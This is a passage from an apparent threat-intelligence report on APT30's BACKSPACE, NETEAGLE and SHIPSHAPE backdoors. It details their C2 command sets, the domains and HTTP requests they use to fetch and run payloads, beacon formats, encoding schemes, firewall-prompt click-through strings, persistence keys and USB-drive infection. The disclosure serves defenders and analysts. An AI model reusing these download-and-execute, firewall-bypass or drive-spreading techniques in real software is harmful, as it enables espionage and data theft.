computer’s saved proxy settings if needed. The data is sent using an HTTP POST request to the URL path
/index.htm.
BACKSPACE also attempts to retrieve the URL path /ForZRLnk3z/connect.gif from the primary
C2 URL domain. If the victim computer’s hostname and hostid are found in the file, the victim will
attempt to establish a connection to the second stage C2 server on Port2 to allow the threat actors to
directly interact with the victim via the BACKSPACE controller. After establishing the connection to
the controller, BACKSPACE awaits further interactive commands from the operator. For this copy of
BACKSPACE, the following commands are supported:
IP: 112.117.9.222 Port1: 443 Port2: 443 Port3:82
35
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
Table 8: Commands supported by BACKSPACE “ZJ” variant 8c713117af4ca6bbd69292a78069e75b
Command Meaning
A Same as J or S, but the file is deleted from the victim computer after transmission.
B Receive a folder and list of filenames from the C2 server; search the folder for the specified files (can use wildcards).
For each file found, upload the encoded WIN32_FIND_DATA32 structure to the C2 server.
C Collects information about running processes (process name, process full path, owner account name, processID,
thread count).
D Receive a folder path, a list of files, and a flag byte for each file from the C2 server. Delete files for which the flag is
0x30 and remove empty folders.
E Receive a file path, access byte (0 for WRITE, else APPEND) and encoded data from the C2 server. Open the file
according to the access byte, decode the data, and write it to the file.
F Receive a Process ID (PID) from the C2 server; elevates privileges (SeTakeOwnershipPrivilege) of the process
identified by the PID and terminate it.
G Receive a path from the C2 server; create a file for writing.
H Receive a path from the C2 server; create a folder.
I Receive two paths from the C2 server; perform a file rename operation.
J Receive a file path and offset from the C2 server. Read the file starting at the specified offset, encode the data, and
send it to the C2 server.
K Receive a PID from the C2 server; terminate the process identified by the PID.
M Receive a path and a set of file attributes from the C2 server; apply the attributes to the file specified by the path.
N Receive a path to a folder from the C2 server; read the content of all the files from the folder and all sub-folders and
upload their content after receiving acknowledgement from the C2 server.
R Receive a command line string from the C2 server and create a new process using the command.
S Same as J.
T Creates a reverse shell with redirected std input/output/error to pipes.
U Delete MSN.lnk from the
V Same as E, but the file is created in the folder
W Enumerate network resources on the victim computer.
X Restart the C2 cycle from the self-update process (perform update, obtain secondary C2 details, send host details,
receive commands, etc.).
Y Receive a list of filenames from the C2 server. Delete the file LwxRsv.tem in
filenames specified by the C2 server; write the Name, LastWriteTime, nFileSizeLow for each file to LwxRsv.tem; send
the content of this file to the C2 server and delete it.
Z “Cancel” command; sends *lecnaC* to the C2 server.
a Receive a registry key path from the C2 server; enumerate the registry values in the registry key and send the
collected data to the C2 server.
b Receive a registry key path from the C2 server; create the specified registry key.
c Receive a registry value path, name, type, data, and size from the C2 server; create the specified registry value.
d Receive a registry key path from the C2 server; delete the registry key and all its sub-keys.
e Receive a registry value path from the C2 server; delete the registry value.
f Same as a command.
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
36
After each command is processed, BACKSPACE sends a status message to the C2 server:
• A message starting with “O” indicates success.
• A message starting with “E” indicates failure.
BACKSPACE BACKDOOR – “ZR” VARIANT
The “ZR” branch of the BACKSPACE malware represents a later fork of the original “ZJ” version. Many
“ZR” variants appear to be streamlined; that is, they may support a subset of the commands used by other
BACKSPACE versions (both “ZJ” and “ZR” variants are compatible with the BACKSPACE controller;
any non-supported commands simply ignored by the BACKSPACE client). However, some “ZR” variants
include new features not seen in other versions of the backdoor, such as the ability to bypass host-based
firewall software.33
The BACKSPACE “ZR” variant with md5 hash 6ee35da59f92f71e757d4d5b964ecf00 was compiled on
28 August 2014. While this sample may include features not present in other (or earlier) versions of
BACKSPACE, much of the malware’s core functionality (such as the use of first-stage and second-stage
C2 locations) has not changed significantly over time. As a recent example of the BACKSPACE malware
family, this sample gives us both an overview of BACKSPACE’s functionality as well as a look at some of
the malware’s “current” features in the ZR branch.
Initial Execution
BACKSPACE creates the mutex MicrosoftZjZRLnk to ensure that only one instance is executing at any
given time. It also creates two events (MicrosoftZjZRLnkExit and MicrosoftZjZRLnkHaveExit) that,
when signaled, trigger all the threads and the malware itself to exit.
The malware extracts system information (OS version, build number, platform, service pack, default
language id) and proxy information (from the ProxyEnable and ProxyServer values under HKEY_
CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\) from the victim
host.
BACKSPACE then creates the registry values lnk (type REG_SZ) and hostid (type REG_DWORD) under the
HKEY_CURRENT_USER\Software\Microsoft\CurrentPnpSetup registry key:
• lnk is set XJOXPSE/mol which is the encoded text WINWORD.lnk
• hostid is set to a random value (used to uniquely identify a victim host).
The malware then creates the directories
Microsoft Office\BIN. The malware is copied to a temporary file whose path is obtained by appending
the .txt file extension to the current malware path and file name. The temporary file then is copied to
the newly created folder
temporary file is deleted. For persistence, BACKSPACE creates the Windows shortcut file WINWORD.lnk
in
BIN\WINWORD.EXE with the description “Microsoft Office Word”.
C2 Domains
Like many BACKSPACE variants, this “ZRLnk” sample is configured with four different C2 domains. The
C2 domains are used in HTTP requests for various files; each file requested via the URI provides additional
instructions or data to the malware. BACKSPACE C2 domains are typically used for different purposes –
that is, each domain is associated with different URIs whose associated files support different functions.
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
37
For this sample, the four C2 domains have the following roles:
• Domain 1 (D1): www.bigfixtools[.]com. This is the primary first-stage C2 domain, used with the
majority of the URIs (and their associated functions).
• Domain 2 (D2): (www.km153[.]com) is the backup C2 domain, which can be promoted to the primary
first-stage domain instead of D1 if necessary. It also can be used to obtain “run/hide” configuration
data (see below).
• Domain 3 (D3) and Domain 4 (D4) (www.km-nyc[.]com and www.bluesixnine[.]com, respectively)
are used to obtain “run/hide” configuration data.
The C2 domains used by APT30 is a single malware sample range from the “brand new” to more
“historical” domains that have been in existence (and use) for several years. For reference, sample
6ee35da59f92f71e757d4d5b964ecf00 was compiled on 8/28/2014 at 09:12:33 GMT; the spear phishing
attacks that dropped this BACKSPACE variant occurred on 8/29/2014.
Table 9: BACKSPACE C2 domains and registration dates.
Alias C2 Domain Description Zone Registration Date
D1 www.bigfixtools[.]com Primary C2 domain 8/26/2014
D2 www.km153[.]com Backup C2 domain; run/hide configuration 8/30/2007
D3 www.bluesixnine[.]com Run/hide configuration 12/4/2012
D4 www.km-nyc[.]com Run/hide configuration 3/11/2004
“Run” vs “Hide” Mode
BACKSPACE reads the registry value hFlag under HKEY_CURRENT_USER\Software\Microsoft\
CurrentPnpSetup. If it exists and is set to 1, the malware switches to “Run Mode”; otherwise, the malware
operates in “Hidden Mode”.
To switch to “Run mode”, BACKSPACE attempts to contacts its C2 servers for validation and to obtain
configuration data (stored in a file named nur.txt). It parses the configuration data and performs a series
of increasingly generic checks to see whether (by inclusion or exclusion) it should remain in “Run mode”.
The methodology is the same as described for the “ZJ” sample above, differing only in the C2 domains
used and the specific URI paths requested.
1. Make an HTTP request to www.bigfixtools.com/ForZRLnk3z/hostlist.txt and validate that the
last byte of the response is 0xFE.
2. Make an HTTP request to the legitimate URL automation.whatismyip.com/n09230945.asp to
obtain the external IP address of the victim host.
3. Make an HTTP request to either www.bluesixnine.com/http/nur.txt, www.km153.com/
http/nur.txt or www.km-nyc.com/http/nur.txt and validate that the response starts with
“abcd1234”; if none of the servers respond accordingly, setting “Run Mode” fails.
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
38
4. If the response from the server contains the “runhost=” option, search for the victim computer’s
hostname in the option data. If found, setting “Run Mode” succeeds; else go to step 5.
5. If the response from the server contains the “runhostexcept=” option, search for the victim
computer’s hostname in the option data. If found, setting “Run Mode” fails; else go to step 6.
6. If the response from the server contains the “runip=” option, search for the victim computer’s
external IP (obtained in step 2) in the option data. If found, setting “Run Mode” succeeds; else go to
step 7.
7. If the response from the server contains the “runipexcept=” option, search for the victim computer’s
external IP (obtained in step 2) in the option data. If found, setting “Run Mode” fails; else go to step 8.
8. If the response from the server contains the “rundir=” option, search for the current C2 URL (e.g.,
www.bigfixtools[.]com/ForZRLnk3z or www.km153[.]com/ForZRLnk3z) in the option data. If found,
setting “Run Mode” succeeds; else go to step 9.
9. If the response from the server contains the “rundirexcept=” option, search for the current C2 URL
in the option data. If found, setting “Run Mode” fails; else go to step 10.
10. If the response from the server contains the “runweb=” option, search for the current C2 domain (e.g.,
www.bigfixtools.com) in the option data. If found, setting “Run Mode” succeeds; else go to step 11.
11. If the response from the server contains the “runwebexcept=” option, search for the current C2
domain in the option data. If found, setting “Run Mode” fails; else go to step 12.
12. If the response from the server contains the “runall=1” option, setting “Run Mode” succeeds.
If switching to “Run Mode” fails, the malware exits.
Once the malware switches to “Run Mode” the hFlag registry value under HKEY_CURRENT_USER\
Software\Microsoft\CurrentPnpSetup is deleted and the victims’ hostname and IP are saved.
A thread to switch the malware back to “Hidden Mode” is started. The thread runs indefinitely
until the MicrosoftZjZRLnkExit event gets signaled; once signaled, the thread signals
MicrosoftZjZRLnkHaveExit event, does clean-up and exits.
Similar to switching to “Run mode” BACKSPACE conducts a series of checks to attempt to switch to
“Hidden Mode”. The methodology is the same as described for the “ZJ” sample above, differing only in the
C2 domains used and the specific URI paths requested.
1. Make an HTTP request to www.bigfixtools.com/ForZRLnk3z/hostlist.txt and validate that the
last byte of the response is 0xFF.
2. Make an HTTP request to the legitimate URL automation.whatismyip.com/n09230945.asp to
obtain the external IP address of the victim host.
3. Make an HTTP request to either www.bluesixnine.com/some/edih.txt, www.km153.com/
some/edih.txt or www.km-nyc.com/some/edih.txt and validate that the response starts with
“abcd1234”; if none of the servers respond accordingly, setting “Hidden Mode” fails.
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
39
4. If the response from the server contains the “hidehost=” option, search for the victim computer’s
hostname in the option data. If found, setting “Hidden Mode” succeeds; else go to step 5.
5. If the response from the server contains the “hidehostexcept=” option, search for the victim
computer’s hostname in the option data. If found, setting “Hidden Mode” fails; else go to step 6.
6. If the response from the server contains the “hideip=” option, search for the victim computer’s
external IP (obtained in step 2) in the option data. If found, setting “Hidden Mode” succeeds; else go
to step 7.
7. If the response from the server contains the “hideipexcept=” option, search for the victim
computer’s external IP (obtained in step 2) in the option data. If found, setting “Hidden Mode” fails;
else go to step 8.
8. If the response from the server contains the “hidedir=” option, search for the current C2 URL (e.g.,
www.bigfixtools[.]com/ForZRLnk3z or www.km153[.]com/ForZRLnk3z) in the option data. If
found, setting “Hidden Mode” succeeds; else go to step 9.
9. If the response from the server contains the “hidedirexcept=” option, search for the current C2
URL (e.g., www.bigfixtools[.]com/ForZRLnk3z or www.km153[.]com/ForZRLnk3z) in the option
data. If found, setting “Hidden Mode” fails; else go to step 10.
10. If the response from the server contains the “hideweb=” option, search for the current C2 domain
(e.g., www.bigfixtools[.]com or www.km153[.]com) in the option data. If found, setting “Hidden
Mode” succeeds; else go to step 11.
11. If the response from the server contains the “hidewebexcept=” option, search for the current C2
domain (e.g., www.bigfixtools[.]com or www.km153[.]com) is searched in the option data; if found,
setting “Hidden Mode” fails; else go to step 12.
12. If the response from the server contains the “hideall=1” option, setting “Hidden Mode” succeeds.
If switching to “Hidden Mode” succeeds, the hFlag registry value under HKEY_CURRENT_USER\Software\
Microsoft\CurrentPnpSetup is created and set to 1.
If BACKSPACE is successfully placed in “Run mode” it performs the following additional tasks:
Primary vs Backup C2 Domains
The malware sends an HTTP request to www.km153[.]com/ForZRLnk3z/bak.txt. If the response starts
with “qazWSX123$%^”, set the primary C2 domain to www.km153[.]com.
Download Additional Files
BACKSPACE sends an HTTP request to the primary C2 URL domain and URL path /ForZRLnk3z/app.
txt and saves the file to the path
downloaded file is a valid PE file, start a new process.
Next, BACKSPACE sends an HTTP request to the primary C2 URL domain and URL path /ForZRLnk3z/
hostlist.txt. If the victim computer’s hostname is found in the response, BACKSPACE sends a new
HTTP request to the primary C2 URL domain and URL path /ForZRLnk3z/myapp.txt and saves the file to
the path
PE file, start a new process.
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
40
BACKSPACE then deletes the following files:
•
•
•
•
Self-Update Mechanism
BACKSPACE uses version control and will attempt to verify the current version and perform a self-
update as follows:
1. Obtain the latest available version number by making an HTTP to request to the primary C2 URL
domain (www.bigfixtools[.]com or www.km153[.]com) and URL path /ForZRLnk3z/ver.txt; if the
version returned does not match the version of the current binary ( “1.9.w.lY” for this sample), go to
step 2
2. Download a new binary by making an HTTP request to the primary C2 URL domain and URL
path /ForZRLnk3z/exe.txt and saving the file to
UpdateWord.exe.
3. If
If the previous update task fails, BACKSPACE performs a secondary update task:
1. Obtain the latest available version number by making an HTTP to request to the primary C2 URL
domain and URL path /ForZRLnk3z/SomeUpVer.txt; if the version returned does not match the
version of the current binary, go to step 2.
2. Make an HTTP request to the primary C2 URL domain and URL path /ForZRLnk3z/SomeUpList.txt
and validate that the victim computer’s hostname is in the response; if true, go to step 3.
3. Download a new binary by making an HTTP request to the primary C2 URL domain and URL path
/ForZRLnk3z/SomeUpExe.txt and saving the file to
UpdateWord.exe.
4. If
BACKSPACE uses the same mutex (MicrosoftZjZRLnk), and event names (MicrosoftZjZRLnkExit,
MicrosoftZjZRLnkHaveExit) across different versions of the same variant. Thus, the malware can
remove the previous version and update to a newer version while ensuring that only one instance of the
same backdoor family is installed on a given host.
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
41
Figure 24: Second stage C2 server information in dizhi.gif
When the malware is updated, the randomly generated hostid from the initial infection (stored in the
registry) is not changed. From the attacker’s perspective, this allows the “identity” of the victim host to
remain consistent, even across multiple version updates.
Second Stage C2 Server
Next, BACKSPACE makes an HTTP request to the primary C2 URL domain (www.bigfixtools[.]com or
www.km153[.]com) and URL path /ForZRLnk3z/dizhi.gif. Dizhi.gif is a 10-byte configuration file
that specifies an IP address and two port numbers.
BACKSPACE starts a new thread to send details about the victim computer (ComputerName, IP,
SystemDetails, DefaultLangID, HostID, Proxy info, malware current version, malware current domain,
and information about the logical drives) to Port1 on the new C2 server. The malware will use the victim
computer’s saved proxy settings if needed. The data is sent using an HTTP POST request with the
following structure:
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
42
A sample beacon is shown below. Note that the HTTP User-Agent header is set to the non-standard value
“SJZJ (compatible; MSIE 6.0; Win32)”.
Figure 25:
Sample BACKSPACE
callback message
Table 10: BACKSPACE “ZRLnk” callback structure
Offset Value Description
0x00 0x30 fixed (1 byte message identifier; 0x30 = ascii 0))
0x01 fd 00 00 00 data length = 253 bytes (4 byte length)
0x05 – computer name (varying length), 0x00
0x14 192.168.43.130, 0x00 IP Address (varying length), 0x00
0x23 253 version information (156 bytes)
0xBF 04 08 language ID (2 bytes)
0xC1 00 proxy on/off (1 byte)
0xC2 41 18 00 00 host_id (4 bytes)
0xC6 1.9.w.lY version string (varying length)
0xCE (Proxy-No), 0x00 proxy setting (varying length), 0x00
0xD9 0:7, 0x00 system uptime – H:M (varying length), 0x00
0xDD www.bigfixtools.com/ForZRLnk3z, 0x00 URL where the second C2 IP is
obtained(varying length), 0x00
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
43
BACKSPACE also attempts to retrieve the URL path /ForZRLnk3z/connect.gif from the primary
C2 URL domain. If the victim computer’s hostname and hostid are found in the file, the victim will
attempt to establish a connection to the second stage C2 server on Port2 to allow the threat actors to
directly interact with the victim via the BACKSPACE controller.35 After establishing the connection to
the controller, BACKSPACE awaits further interactive commands from the operator. For this copy of
BACKSPACE, the following commands are supported:
Table 11: Commands supported by BACKSPACE “ZRLnk” variant
6ee35da59f92f71e757d4d5b964ecf00
Command Meaning
A Same as J or S, but the file is deleted from the victim computer after transmission.
B Receive a folder and list of filenames from the C2 server; search the folder for the
specified files (can use wildcards). For each file found, upload the encoded WIN32_FIND_
DATA36 structure to the C2 server.
D Receive a folder path, a list of files, and a flag byte for each file from the C2 server. Delete
files for which the flag is 0x30 and remove empty folders.
E Receive a file path, access byte (0 for WRITE, else APPEND) and encoded data from the C2
server. Open the file according to the access byte, decode the data, and write it to the file.
J Receive a file path and offset from the C2 server. Read the file starting at the specified
offset, encode the data, and send it to the C2 server.
R Receive a command line string from the C2 server and create a new process using the
command.
S Same as J.
V Same as E, but the file is created in the folder
X Restart the C2 cycle from the self-update process (perform update, obtain secondary C2
details, send host details, receive commands, etc.).
Z “Cancel” command; sends *lecnaC* to the C2 server.
After each command is processed, BACKSPACE sends a status message to the C2 server; messages
starting with “O” indicate success, messages starting with “E” indicate failure.
Configuration and C2 Encoding
While earlier versions of BACKSPACE may contain the C2 domains and other variables in plain text
within the binary, they are encoded within this (and other more recent) variants. Decoding is done in two
ways: by adding an incremental counter, or by XORing and bitwise shifting bytes.
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
44
Figure 26: BACKSPACE string decryption by adding incremental counter
Figure 27: BACKSPACE string decryption by XORing and bitwise shifting bytes
In addition, binary (non-string) data transferred between the victim host and the second stage C2 server
is encoded/decoded by adding an incremental counter and XORing with 0x23, as shown below.
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
45
Figure 28: Binary data encryption by adding an incremental counter and XORing
Figure 29: BACKSPACE HTTP POST showing custom encoding
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
46
Host-Based Firewall Bypass
This variant of BACKSPACE includes functionality to attempt to bypass a number of personal firewall
applications. BACKSPACE iterates through open windows and matches the type (Button) and its
associated Window Text against a set of strings stored within the malware. If a match is found,
BACKSPACE sends a message to simulate a mouse click, attempting to “approve” firewall rules to allow
the malware to execute. Both English and Chinese strings are stored, implying that the malware attempts
to target versions of the products below that are localized for those languages.37
Table 12: Strings used in attempt to bypass host-based firewalls
Security Product Meaning
Avira Note action selected for this file (dangerous)
请注意为此文件选择的操作(危险)
F-Secure I trust the program. Let it continue.
我信任该程序。继续执行。
Do not show this dialog for this program again
不再为此程序显示此对话框
AVG Firewall Save my answer as a permanent rule, and do not ask me next time
将我的回答作为永久规则保存下来,下次不再询问。
Sophos Firewall Add the checksum to existing checksums for this application
将此应用程序的检查和添加到现有的检查和中。
Allow all hidden processes launched by
启动的所有隐藏进程访问网络
Panda Security Always allow the connection 总是允许此连接
TPSVARadioBtn, TPSVAButton
McAfee McXpBtn2, McAlertButtonClass
Others Trust 信任
Ignore 忽略
Allow 允许
Allow (recommended) 允许 (推荐)
OK 确定
Remember this action 总是允许
Do not show this message again before rebooting
Grant access
Allow this change
运行
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
47
NETEAGLE BACKDOOR – “SCOUT” VARIANT
The NETEAGLE backdoor appears to have been developed after BACKSPACE, with early NETEAGLE
samples dating to 2008. The “Scout” variant (named for the mutex “Neteagle_Scout” used by this version)
was the earlier of the two. While NETEAGLE shares some similarities with BACKSPACE, including
retrieval of commands from specific URIs, automatic updating, and a two-stage command and control
structure, NETEAGLE typically uses a single C2 domain (instead of up to four used by BACKSPACE) and
supports a more limited set of URIs for command retrieval. In addition, NETEAGLE supports an entirely
different set of commands than BACKSPACE; it is not compatible with the BACKSPACE controller and is
presumed to have its own separate controller software. Later variants of NETEAGLE (e.g., the “Norton”
versions) also support a modular “plugin” framework that allows the backdoor to load and execute DLLs
for additional functionality.
The NETEAGLE sample 3feef9a0206308ee299a05329095952a was compiled on 9 April 2009. The
malware creates the directory C:\Program Files\Messenger\ and copies itself to that directory as
msmsgr.exe. NETEAGLE also creates the following registry value for persistence:
Value: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msmsgr
Data: C:\Program Files\Messenger\msmsgr.exe
NETEAGLE first attempts to retrieve the file allupdate.xml using the following HTTP request:
GET /yzstmfa/allupdate.xml HTTP/1.1
User-Agent: [filename of malware]
Host: www.autoapec.com
Cache-Control: no-cache
The file is saved to %DEFAULTUSERPROFILE%\ieupdate.exe and executed.
NETEAGLE then downloads hxxp://www.autoapec[.]com/yzstmfa/update.xml and decrypts the file
with the RC4 key “ScoutEagle”. In the decrypted result, the malware looks for the hostname of the system.
If the hostname is present, the malware downloads hxxp://www.autoapec[.]com/yzstmfa/updateapp.
xml, saves it to %DEFAULTUSERPROFILE%\visit.exe and executes the file.
Once the initial update URLs are downloaded, the malware creates the mutex “NetEagle_Scout” and
begins the process of obtaining the second-stage C2 IP address(es) and port.
NETEAGLE downloads the URL hxxp://www.autoapec[.]com/yzstmfa/pic1.bmp and RC4 decrypts
the first four bytes of the response using the key “ScoutEagle”. The decrypted bytes are a callback IP. If
the victim computer is not configured to use a proxy, the malware sends a 363 byte UDP beacon to port
6000 on the decrypted IP. If a proxy is enabled, the malware sends the same 363 byte beacon using the
following HTTP POST request:
48
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
Figure 30:
NETEAGLE
‘Scout’ sample
beacon
POST /index.htm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Win32)
Host: [Callback IP]
Content-Length: 3
63
Connection: Keep-Alive
Cache-Control: no-cache
00000000 a3 0b cf 8b f9 56 ed bc be 0f 8b 6d b8 35 db 26 …..V.. …m.5.&
00000010 57 37 58 36 34 5f 41 4e 41 4c 59 53 49 53 00 c0 W7X64_AN ALYSIS..
00000020 a8 38 6f 00 00 00 00 32 2e 31 38 00 69 6e 64 6f .8o….2 .18.indo
00000030 77 73 20 58 50 20 36 2e 31 20 42 75 69 6c 64 37 ws XP 6. 1 Build7
00000040 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 6b 601 Serv ice Pack
00000050 20 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1…… ……..
00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …….. ……..
00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …….. ……..
00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …….. ……..
00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …….. ……..
000000A0 00 00 00 00 00 00 00 00 00 00 00 32 30 31 35 2d …….. …2015-
000000B0 32 2d 32 20 31 37 3a 34 3a 33 32 00 00 00 00 00 2-2 17:4 :32…..
000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …….. ……..
000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …….. ……..
000000E0 00 00 00 00 00 00 00 00 00 00 00 52 45 00 00 00 …….. …RE…
000000F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …….. ……..
00000100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …….. ……..
00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …….. ……..
00000120 00 00 00 00 00 00 00 00 00 00 00 32 30 34 37 20 …….. …2047
00000130 4d 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 MB…… ……..
00000140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …….. ……..
00000150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …….. ……..
00000160 00 00 00 00 00 00 00 00 00 00 00 …….. …
The POST data consists of the following:
Table 13: NETEAGLE beacon contents
Data Meaning
a30bcf8bf956edbcbe0f8b6db835db26 Nd5 hash of the callback URL (http://www.autoapec[.]com/
yzstmfa/pic1.bmp)
W7X64_ANALYSIS Hostname of victim computer
c0 a8 38 6f IP address of victim computer
2.18 Malware version
Winows XP 6.1 Build7601 Service Pack 1 OS Version (truncated ‘W’)
2015-2-2 17:4:32 Date / time from victim computer
RE Active username from victim computer
2047 MB Amount of memory on victim computer
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
49
NETEAGLE then requests the URL hxxp://www.autoapec.com/yzstmfa/pic2.bmp. The response is
expected to be less than 0x17 bytes (additional data, if received, is ignored) and is decrypted using the RC4
key “ScoutEagle”. The decrypted response consists of the following data:
[Hostname (up to 15 bytes)]\x00[IP address in network byte order][Port]
If the hostname of the victim computer is listed in the decrypted response, the malware initiates a TCP
connection to the specified IP and port. This session is not encrypted. The C2 protocol consists of a 4 byte
DWORD command ID. If the command ID takes an argument, a 4 byte DWORD identifying the length of the
argument is sent.
Table 14: NETEAGLE “Scout” commands
Command Meaning Command Meaning
0x02 Sends “NetEagle_Scout[hostname]\x00” 0x15 Get file attributes
0x03 List drives attached to the system (fixed, remote
and CDROM)
0x16 Set file attributes
0x04 List directories 0x17 Get volume information
0x05 List directories with file details 0x18 Set the volume label
0x06 Rename a file or directory 0x19 Shell execute
0x07 Create file 0x20 Uninstall
0x08 Create directory 0x21 Search for file / directory
0x09 Delete file or directory 0x22 Sends “NETEAGLE_SCOUT”
0x10 Perform file operation 0x23 Get file information (size and last modified)
0x11 List directory contents 0x24 Establish a remote desktop session back to
controller on TCP port 7519
0x12 Read file 0x25 Process listing
0x13 Write file 0x26 Read file
0x14 Get directory used space
Finally, NETEAGLE downloads the URL hxxp://www.autoapec[.]com/yzstmfa/pic4.bmp. The response
is decrypted with the same RC4 key (“ScoutEagle”). The format of the decrypted response is:
[MD5 of file to be downloaded][URL]
NETEAGLE downloads the URL to %temp%\Services.exe and executes the file.
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
50
NETEAGLE BACKDOOR – “NORTON” VARIANT
The “Norton” variants of the NETEAGLE backdoor (named for the mutex “Eagle-Norton360-OfficeScan”
used by the malware) appear to have been developed later than that “Scout” versions, with early samples
compiled in 2013.
The NETEAGLE “Norton” sample 8a88f8803e8db8baee537a175960cdbe was compiled on 6 November
2013. This version supports many of the same commands as the “Scout” version, but has several
differences, including:
• The “Norton” variant does not include its own persistence mechanism.39
• Use of a different mutex (“Eagle-Norton360-OfficeScan”).
• The “Norton” variant does not support the various HTTP requests to download and execute files
(e.g., allupdate.xml, update.xml, updateapp.xml, and pic4.bmp).
• Although the “Norton” variant checks whether the victim host uses a proxy configuration, it always
beacons using a proxy request. 40
• Different encoding method for strings (“Norton” adds 2 instead of 4).
• Support of different / additional commands (see below).
• Support for loading DLLs for additional functionality.
The NETEAGLE “Norton” variant uses a similar process to identify its second-stage C2 server. The
malware requests the file pic1.bmp from its first-stage C2 server using the following HTTP request:
Similar to the “Scout” variant, the response is decrypted using the RC4 key “ScoutEagle” to obtain the IP
address of the beacon server. The beacon format is the same as that used by the “Scout” variant.
The NETEAGLE “Norton” variant will request the URL hxxp://www.creammemory[.]com/update1/pic2.
bmp and decrypt the response with the RC4 key “ScoutEagle”. The expected response format is the same
as that for the “Scout” variant:
[Hostname (up to 15 bytes)]\x00[Redirect IP in network byte order][Port]
Figure 31: NETEAGLE “Norton” HTTP request
GET /update1/pic1.bmp HTTP/1.1
User-Agent: [filename of malware]
Host: www.creammemory.com
Cache-Control: no-cache
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
51
Table 15: NETEAGLE “Norton” commands that differ from “Scout” variant
Command Meaning
0x20 Not implemented.
0x24 Load a DLL and call the DoWork export using DoWork([C2 IP] , 81, 4003, 4004). The
encoded string representing the DLL filename does not decode correctly (“PCo^jb+aii”,
possibly intended to be “SFrame.dll”).
0x26 Not implemented.
0x27 Load a DLL and call the DoWork export using DoWork([C2 IP] , 82, 4015, 4016). The
encoded string representing the DLL filename does not decode correctly (“PJrifq+aii”,
possibly intended to be “SMulit.dll”).
0x28 Load a DLL and call the DoWork export using DoWork([C2 IP] , 83, 4005, 4006). The
encoded string representing the DLL filename does not decode correctly (“PQikq+aii”,
possibly intended to be “STlnt.dll”).
0x29 Load a DLL and call the DoWork export using DoWork([C2 IP] , 84, 4009, 4010). The
encoded string representing the DLL filename does not decode correctly (“PQikq+aii”,
possibly intended to be “SProc.dll”).
The NETEAGLE “Norton” variant supports most of the same commands as the “Scout” variant, with the
following exceptions:
MALWARE TARGETING REMOVABLE DRIVES
APT30 uses three pieces of malware that are believed to have been designed to propagate to removable
drives with the intent of eventually infecting and stealing data from computers located on air-gapped
networks.
SHIPSHAPE
SHIPSHAPE samples have been identified with compile times as early as 2006 and as recently as 2014.
SHIPSHAPE initially targets removable and fixed drives with less than a specific amount of space available
to the SHIPSHAPE process. Earlier samples required less than 1,000,000,000 bytes (~1GB); the sample
described in detail below requires less than 10,000,000,000 bytes (0x2540BE400) or approximately
10GB.41 The intent is likely to use the drive to spread malware to additional systems.
The sample f18be055fae2490221c926e2ad55ab11 was compiled on 23 August, 2012. The malware
replaces files and folders on targeted drives with executable files from specified paths on the SHIPSHAPE-
infected system. 42 The specific files and folders replaced may vary based on the SHIPSHAPE sample. 43
Targeted files and folders are marked as hidden; SHIPSHAPE copies the specified executable file or files to
the removable drive using the same names as the targeted files and folders, but with an .exe extension (for
example, if the drive contained the file MyDocument , SHIPSHAPE would create a file with the name
MyDocument .exe. A user attempting to access a “document” on the removable drive would potentially
be tricked into running the executable instead. It is believed that the executable will open the original
document or folder when executed, to disguise the fact that malicious activity is occurring.
APT30 and the Mechanics of a Long-Running Cyber Espionage OperationSPECIAL REPORT
52
When executed, SHIPSHAPE creates the mutex “MicrosoftShipZJ”. The malware copies itself to
%HOMEPATH%\My Documents\Visual Studio 2005\MSDEV\IDE\MSDEV.EXE. For persistence, SHIPSHAPE
creates a shortcut in the user’s Startup folder named “Visual Studio.lnk” using the comment “Visual
Studio 2005” and a target path of %HOMEPATH%\My Documents\Visual Studio 2005\MSDEV\IDE\MSDEV.
EXE (variable is expanded).
The malware creates the registry key HKEY_LOCAL_MACHINE\Software\Microsoft\ShipUp with the
following value and data:
Value: lnk
Data: Wjtvbm!Tuvejp/mol
The data is the encoded name of the malware’s shortcut file (in this case, “Visual Studio.lnk”); the
hexadecimal value of each character in the original file name is incremented by one (so “V” (0x56)
becomes “W” (0x57) , etc.).
SHIPSHAPE disables AutoRun and hides both hidden files and file extensions by setting the following
registry values:
